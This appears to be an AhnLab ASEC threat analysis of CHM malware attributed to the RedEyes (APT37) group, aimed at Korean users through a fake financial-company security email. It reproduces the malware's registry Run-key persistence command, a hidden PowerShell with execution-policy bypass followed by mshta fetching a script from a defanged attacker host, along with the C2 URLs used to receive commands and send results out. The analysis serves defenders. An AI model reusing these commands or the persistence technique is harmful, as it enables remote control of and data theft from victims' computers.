ASEC (AhnLab Security Emergency response Center) analysis team has discovered that the CHM malware, which is assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), is being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, which was reported back in February, has the same format as the command used in this attack. This information, as well as the details of the CHM malware’s operation process, is described in the following post.
When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script that exists within the CHM is activated during this process, making it difficult for users to notice. There has been a recent increase in malware distribution using CHM.
The malicious script that’s executed is shown below, and, like the other CHM malware introduced in the past, it also uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command under the Item1 entry is executed. This file executes an additional script that exists within a certain URL through the mshta process.
- Executed Command
An examination of the decoded PowerShell command revealed that everything aside from the C2 address, the file name under which the command execution results are saved, and the registry value, has the same code as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.
- RUN Key Registration
Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: icxrNpVd
Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 18.104.22.168 || mshta hxxp://shacc[.]kr/skin/product/1.html
hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
When a system is infected with this type of malware, the system can suffer great damage since this malware is capable of performing various malicious acts such as downloading files and extorting information according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute the malware, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.